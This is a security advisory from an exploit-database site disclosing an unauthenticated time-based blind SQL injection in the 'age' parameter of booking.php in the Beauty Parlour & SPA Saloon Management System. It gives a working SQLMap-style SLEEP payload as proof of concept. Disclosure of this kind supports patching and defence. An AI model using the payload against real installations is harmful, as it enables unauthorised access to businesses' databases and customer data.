Beauty Parlour And SPA Saloon Management System SQL Injection

2016.07.12
Credit: Yakir Wizman
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#### # Vulnerability Title : Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability # Date : 11/07/2016 # Exploit Author : Yakir Wizman # Vendor Homepage : http://rexbd.net/software/beauty-parlour-and-spa-saloon-management-system # Version : All Versions # Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30 #### # Software Link : N/A # Google Dork : N/A # CVE : N/A #### # Vendor Software Description: # Managing a health and beauty business is a unique endeavor that is unlike any other. You want an operating software that will enhance the atmosphere you?ve worked hard to instill in your salon. # Our salon management system was created to effectively match the needs of health and beauty business owners nationwide. # When you purchase this beauty Parlour / salon software, you will find that every aspect of managing your company is covered in this extensive system. #### # No authentication (login) is required to exploit this vulnerability. # Blind SQL Injection Proof-Of-Concept (Using SQLMap) # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # URL example : http://server/booking.php # # Page : booking.php # Parameter : age (POST) # Type : AND/OR time-based blind # Title : MySQL >= 5.0.12 AND time-based blind # Payload : name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test # ####


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top